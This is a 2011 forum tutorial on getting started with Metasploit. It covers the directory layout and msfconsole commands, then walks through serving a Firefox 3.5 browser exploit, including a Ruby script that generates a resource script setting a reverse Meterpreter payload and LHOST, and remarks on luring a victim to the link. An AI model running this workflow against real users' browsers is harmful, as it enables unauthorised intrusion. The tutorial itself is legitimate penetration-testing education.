
How to get started with Metasploit

Discussion in 'Ethical hacking Tips' started by lionaneesh, Jan 26, 2011.

  1. lionaneesh

    Metasploit is an exploitation framework consisting of tools, exploits, payloads and supporting knowledge. It is a boon to pen-testers, exploit developers and hackers.

    The project was started by H.D. Moore and is now an open source project maintained by Rapid7.

    For download and installation instructions, see the Metasploit project's download page.

    I will use my Ubuntu 10.10 install for the code samples, so some commands may differ on other OS versions. If you have questions, please post them in the comments below.

    The directory structure

    Metasploit has a self-explanatory, user-friendly directory structure.

    On this Linux install the Metasploit directory is /opt/metasploit3 (other installers may put it elsewhere):

    aneesh@aneesh-laptop:~$ cd /opt/metasploit3/
    Let's look at the different directories:

    aneesh@aneesh-laptop:/opt/metasploit3$ ls
    app  bin  env.sh  lib  msf3  run.sh
    aneesh@aneesh-laptop:/opt/metasploit3$ cd msf3/
    aneesh@aneesh-laptop:/opt/metasploit3/msf3$ ls
    armitage       HACKING  msfconsole  msfgui       msfpescan  plugins  tools
    data           lib      msfd        msfmachscan  msfrpc     README
    documentation  modules  msfelfscan  msfopcode    msfrpcd    scripts
    external       msfcli   msfencode   msfpayload   msfupdate  test
    The data directory contains supporting data used by the modules: PHP sources, wordlists, the Meterpreter and VNC DLLs, templates and so on.

    aneesh@aneesh-laptop:/opt/metasploit3/msf3$ cd data/
    aneesh@aneesh-laptop:/opt/metasploit3/msf3/data$ ls
    armitage             isight.bundle            passivex   vncdll.dll
    eicar.com            java                     php        vncdll.x64.dll
    eicar.txt            lab                      post       wmap
    emailer_config.yaml  meterpreter              snmp       wordlists
    exploits             msfcrawler               sounds
    gui                  msflinker_linux_x86.bin  sql
    ipwn                 msfpescan                templates
    The lib directory: the name is self-explanatory; it contains the Ruby libraries Metasploit itself is built on.

    The directory of most use to us is the modules directory:

    aneesh@aneesh-laptop:/opt/metasploit3/msf3$ cd modules
    aneesh@aneesh-laptop:/opt/metasploit3/msf3/modules$ ls
    auxiliary  encoders  exploits  modules.rb.ts.rb  nops  payloads  post
    • The exploits dir: contains the exploits, organised by platform (multi, windows, ...) and then by the kind of target (browser, ...), as the search results below show.
    • The encoders dir: contains the encoders that re-encode a payload, for example to avoid bad characters the target would reject.
    • The auxiliary dir: contains modules that do not deliver a payload: scanners, sniffers, fuzzers, DoS modules and the like.
    • The payloads and nops dirs: payloads are the code that runs on the target after exploitation (shells, Meterpreter); nops generate the NOP sleds used to pad them.
    • The post dir: post-exploitation modules that run on an already compromised host.

    Getting to know Metasploit

    The main way to drive Metasploit is through one of its interfaces. Four are commonly listed:
    1. msfweb (the web interface)
    2. msfgui (the graphical user interface)
    3. msfconsole (the console interface)
    4. msfcli (the command line interface)
    Note that the msf3 listing above has msfgui, msfconsole and msfcli (plus armitage, a separate GUI front end, and msfrpcd for remote control) but no msfweb; it is not part of this install. The console is the most powerful and most used interface, so we'll use it throughout this tutorial.

    To start Metasploit, type 'msfconsole' in your shell; you should see output similar to this:
    aneesh@aneesh-laptop:~$ msfconsole
                                     | |      o
     _  _  _    _ _|_  __,   ,    _  | |  __    _|_
    / |/ |/ |  |/  |  /  |  / \_|/ \_|/  /  \_|  |
      |  |  |_/|__/|_/\_/|_/ \/ |__/ |__/\__/ |_/|_/
           =[ metasploit v3.6.0-dev [core:3.6 api:1.0]
    + -- --=[ 643 exploits - 328 auxiliary
    + -- --=[ 216 payloads - 27 encoders - 8 nops
           =[ svn r11647 updated today (2011.01.26)
    msf > 
    Now that we know how to open Metasploit, let's look at its modules.

    Two commands help here:

    show (type): lists the loaded modules of a type, e.g. show exploits, show auxiliary, show payloads, or show all for everything
    search (pattern): searches the loaded modules for a pattern

    For example, let's search for Firefox exploits and see what's in store for us:

    msf > search firefox
    [*] Searching loaded modules for pattern 'firefox'...
       Name                                              Disclosure Date  Rank       Description
       ----                                              ---------------  ----       -----------
       multi/browser/firefox_escape_retval               2006-07-14       normal     Firefox 3.5 escape() Return Value Memory Corruption
       multi/browser/firefox_queryinterface              2006-02-02       normal     Firefox location.QueryInterface() Code Execution
       multi/browser/mozilla_compareto                   2005-07-13       normal     Mozilla Suite/Firefox InstallVersion->compareTo() Code Execution
       multi/browser/mozilla_navigatorjava               2006-07-25       normal     Mozilla Suite/Firefox Navigator Object Code Execution
       windows/browser/apple_quicktime_rtsp              2007-01-01       normal     Apple QuickTime 7.1.3 RTSP URI Buffer Overflow
       windows/browser/awingsoft_winds3d_sceneurl        2009-11-14       excellent  AwingSoft Winds3D Player 3.5 SceneURL Download and Execute
       windows/browser/dxstudio_player_exec              2009-06-09       excellent  Worldweaver DX Studio Player <= 3.0.29 shell.execute() Command Execution
       windows/browser/ms07_017_ani_loadimage_chunksize  2007-03-28       great      Windows ANI LoadAniIcon() Chunk Size Stack Buffer Overflow (HTTP)
    msf > 
    Notice that the search hits more than the Firefox-specific modules: search matches the pattern against a module's details (description, targets and so on), not only its name, so browser exploits such as the QuickTime and ANI ones also show up because they mention Firefox. Read the description and the Rank column before picking one.

    This is the power of Metasploit!

    Let's use the 'use' command to select an exploit.

    Syntax :-
    use (path)
    Output :-
    msf > use exploit/multi/browser/firefox_escape_retval 
    msf exploit(firefox_escape_retval) > 
    Now let's look at the exploit's options with show options:
    msf exploit(firefox_escape_retval) > show options
    Module options (exploit/multi/browser/firefox_escape_retval):
       Name        Current Setting  Required  Description
       ----        ---------------  --------  -----------
       SRVHOST                      yes       The local host to listen on.
       SRVPORT     8080             yes       The local port to listen on.
       SSL         false            no        Negotiate SSL for incoming connections
       SSLVersion  SSL3             no        Specify the version of SSL that should be used (accepted: SSL2, SSL3, TLS1)
       URIPATH                      no        The URI to use for this exploit (default is random)
    Exploit target:
       Id  Name
       --  ----
       0   Firefox 3.5.0 on Windows XP SP0-SP3
    Let us now set the options. This is done with:

    set (option name) (value)

    Now let's set the options for this run:
    msf exploit(firefox_escape_retval) > set SRVHOST localhost
    SRVHOST => localhost
    msf exploit(firefox_escape_retval) > set SRVPORT 80
    SRVPORT => 80
    msf exploit(firefox_escape_retval) > set URIPATH /exploit
    URIPATH => /exploit
    Explanations:

    1. 'set SRVHOST localhost' sets the address our exploit server listens on. localhost is fine for a test on your own machine, but a real target must be able to reach this address, so for a target on the network set SRVHOST to the IP of the interface facing it.
    2. 'set SRVPORT 80' sets the port number the server listens on. Port 80 is the default for web servers, so the link carries no visible port; binding a port below 1024 on Linux needs root.
    3. 'set URIPATH /exploit' sets the path of the exploit page (otherwise Metasploit picks a random one).

    With these settings the victim has to open http://localhost/exploit (the SRVHOST address plus the URIPATH) for the exploit to fire.

    Now that the options are set, let's run the exploit. This is done with the exploit command. Because this is a server-side browser exploit, it runs as a background job and waits for a visitor:

    Output:
    msf exploit(firefox_escape_retval) > exploit
    [*] Exploit running as background job.
    [*] Started reverse handler on 
    [*] Using URL: http://localhost:80/exploit
    [*] Server started.
    The output shows the exploit server is up at http://localhost:80/exploit. Note the empty "Started reverse handler on" line: no PAYLOAD or LHOST was set, so the default reverse payload has no address to connect back to. Before using this against a real target, set PAYLOAD and LHOST and run show options again (the payload adds its own options), so a session has somewhere to land.

    The rest is social engineering: a user running the vulnerable browser (Firefox 3.5.0 on Windows XP, per the exploit target above) has to open the link.

    I hope this is enough to get you started with Metasploit.
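    The module directory walk-through and the search step above both come down to the same thing: msfconsole loads every .rb under modules/, turns the on-disk path into the name you give to use (note the plural directory exploits/ but the singular exploit/ in the module name), and search matches your pattern against each module's details, not just its name. The following Ruby script is an added example, not Metasploit's own code, that reproduces that mapping and search on a constructed tree of three minimal module sources; the sources only carry the metadata fields the script reads and are not the real modules.

```ruby
# Added example, not Metasploit's own code: a miniature of what msfconsole's
# `search` and `use` do with modules/, showing how a path such as
# modules/exploits/multi/browser/foo.rb becomes the name exploit/multi/browser/foo.
# The module sources below are constructed and hold only the fields read here.
require 'tmpdir'
require 'fileutils'

# Directory under modules/ -> type prefix used by `use <type>/<path>`.
TYPE_BY_DIR = {
  'exploits' => 'exploit', 'auxiliary' => 'auxiliary', 'payloads' => 'payload',
  'encoders' => 'encoder', 'nops' => 'nop', 'post' => 'post',
}.freeze

# Constructed module sources keyed by path relative to modules/.
SAMPLE_MODULES = {
  'exploits/multi/browser/firefox_escape_retval.rb' => <<~'RB',
    class Metasploit3 < Msf::Exploit::Remote
      Rank = NormalRanking
      def initialize(info = {})
        super(update_info(info,
          'Name'           => 'Firefox 3.5 escape() Return Value Memory Corruption',
          'Description'    => %q{ Memory corruption in the escape() return value of Firefox 3.5. },
          'DisclosureDate' => 'Jul 14 2006'))
      end
    end
  RB
  'exploits/windows/browser/apple_quicktime_rtsp.rb' => <<~'RB',
    class Metasploit3 < Msf::Exploit::Remote
      Rank = NormalRanking
      def initialize(info = {})
        super(update_info(info,
          'Name'           => 'Apple QuickTime 7.1.3 RTSP URI Buffer Overflow',
          'Description'    => %q{ Delivered via the browser; Firefox on Windows is among the targets. },
          'DisclosureDate' => 'Jan 01 2007'))
      end
    end
  RB
  'auxiliary/scanner/http/dir_scanner.rb' => <<~'RB',
    class Metasploit3 < Msf::Auxiliary
      def initialize(info = {})
        super(update_info(info,
          'Name'        => 'HTTP Directory Scanner',
          'Description' => 'Brute forces directory names on a web server'))
      end
    end
  RB
}.freeze

# Pull out the fields that `search` matches against.
def parse_module(source)
  desc = source[/'Description'\s*=>\s*%q\{(.*?)\}/m, 1] ||
         source[/'Description'\s*=>\s*'([^']*)'/, 1]
  rank = source[/^\s*Rank\s*=\s*(\w+)Ranking/, 1]
  {
    name:            source[/'Name'\s*=>\s*'([^']*)'/, 1],
    description:     desc.to_s.strip.gsub(/\s+/, ' '),
    disclosure_date: source[/'DisclosureDate'\s*=>\s*'([^']*)'/, 1],
    rank:            (rank || 'Normal').downcase, # modules without a Rank default to normal
  }
end

# modules/exploits/multi/browser/foo.rb -> exploit/multi/browser/foo
def use_path(relative_path)
  type_dir, *rest = relative_path.sub(/\.rb\z/, '').split('/')
  type = TYPE_BY_DIR.fetch(type_dir) { raise ArgumentError, "unknown module dir #{type_dir}" }
  ([type] + rest).join('/')
end

# Load every module under <root>/modules, the way msfconsole does at start-up.
def load_modules(root)
  base = File.join(root, 'modules')
  Dir.glob(File.join(base, '**', '*.rb')).sort.map do |file|
    rel = file.sub(%r{\A#{Regexp.escape(base)}/}, '')
    parse_module(File.read(file)).merge(path: use_path(rel))
  end
end

# Case-insensitive match on path, name and description, like `search <pattern>`.
def search(root, pattern)
  re = Regexp.new(Regexp.escape(pattern), Regexp::IGNORECASE)
  load_modules(root).select { |m| [m[:path], m[:name], m[:description]].any? { |f| f.to_s =~ re } }
end

# Write the constructed modules into a temporary tree and return its root.
def build_sample_tree
  root = Dir.mktmpdir('msf3-')
  SAMPLE_MODULES.each do |rel, src|
    file = File.join(root, 'modules', rel)
    FileUtils.mkdir_p(File.dirname(file))
    File.write(file, src)
  end
  root
end

if $PROGRAM_NAME == __FILE__
  search(build_sample_tree, 'firefox').each do |m|
    puts format('%-45s  %-12s  %-7s  %s', m[:path], m[:disclosure_date], m[:rank], m[:name])
  end
end
```

    Run it and the QuickTime module shows up for 'firefox' even though its name never mentions Firefox, which is exactly why the real search output above lists non-Firefox browser exploits; the fix is to read the description and rank, not to trust the hit.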
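    The use / set / exploit sequence above is typed by hand, which is how SRVHOST ends up as localhost and the reverse handler ends up with no address. The script below is an added example, not Metasploit's own code: it writes the same sequence as an msfconsole resource script and checks the options that are easy to get wrong first. SRVHOST, SRVPORT and URIPATH are the option names from show options above; PAYLOAD, LHOST and LPORT are assumed here for a reverse payload and do not appear on the page, and the 192.0.2.10 address is a made-up lab value.

```ruby
# Added example, not Metasploit's own code: builds an msfconsole resource
# script for the post's workflow (use -> set -> exploit) and validates the
# options before anything listens. PAYLOAD/LHOST/LPORT are assumptions for a
# reverse payload; SRVHOST/SRVPORT/URIPATH are the names shown by `show options`.
require 'ipaddr'

MODULE_RE = %r{\A(exploit|auxiliary|post)/[\w\-/]+\z}

# Returns { errors: [...], warnings: [...] }. Errors block the script; warnings
# flag settings that work on a single box but not against a real target.
def validate_options(srvhost:, srvport:, uripath:, lhost:)
  errors, warnings = [], []
  { 'SRVHOST' => srvhost, 'LHOST' => lhost }.each do |name, value|
    begin
      ip = IPAddr.new(value.to_s)
      # 127.0.0.1 only reaches this machine; the victim needs a routable address.
      warnings << "#{name}=#{value} is loopback; only a browser on this host can reach it" if ip.loopback?
    rescue IPAddr::InvalidAddressError
      # A hostname is resolved on the attacker's box, not the target's.
      errors << "#{name}=#{value} is not an IP address; use the interface address the target can reach"
    end
  end
  port = Integer(srvport) rescue nil
  if port.nil? || !(1..65_535).cover?(port)
    errors << "SRVPORT=#{srvport} is not a valid TCP port"
  elsif port < 1024
    warnings << "SRVPORT=#{port} is privileged; msfconsole must run as root to bind it"
  end
  errors << "URIPATH=#{uripath} must start with '/' and contain no whitespace" unless uripath.to_s =~ %r{\A/\S*\z}
  { errors: errors, warnings: warnings }
end

# The commands the post types by hand, as one resource script. Raises on errors.
def resource_script(module_path, payload: 'windows/meterpreter/reverse_tcp', lport: 4444, **opts)
  raise ArgumentError, "bad module path #{module_path}" unless module_path =~ MODULE_RE
  check = validate_options(**opts)
  raise ArgumentError, check[:errors].join('; ') unless check[:errors].empty?
  [
    "use #{module_path}",
    "set SRVHOST #{opts[:srvhost]}",
    "set SRVPORT #{opts[:srvport]}",
    "set URIPATH #{opts[:uripath]}",
    "set PAYLOAD #{payload}", # reverse payload: the target connects back to LHOST:LPORT
    "set LHOST #{opts[:lhost]}",
    "set LPORT #{lport}",
    'show options',           # re-check: the payload adds its own options
    'exploit -j',             # run as a background job and keep the console
  ].join("\n") + "\n"
end

if $PROGRAM_NAME == __FILE__
  opts = { srvhost: '192.0.2.10', srvport: 8080, uripath: '/exploit', lhost: '192.0.2.10' } # assumed lab addresses
  validate_options(**opts)[:warnings].each { |w| warn "warning: #{w}" }
  puts resource_script('exploit/multi/browser/firefox_escape_retval', **opts)
end
```

    Save the printed script as firefox.rc and feed it to the console with msfconsole -r firefox.rc; with the post's own values (SRVHOST localhost, SRVPORT 80) the validator refuses the hostname and warns about the privileged port, which is the check you want before pointing a real browser at the link.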
  2. lionaneesh

    Thanks Shabbir,
    for accepting my articles and making them much better with the edits.

    Thanks a ton!
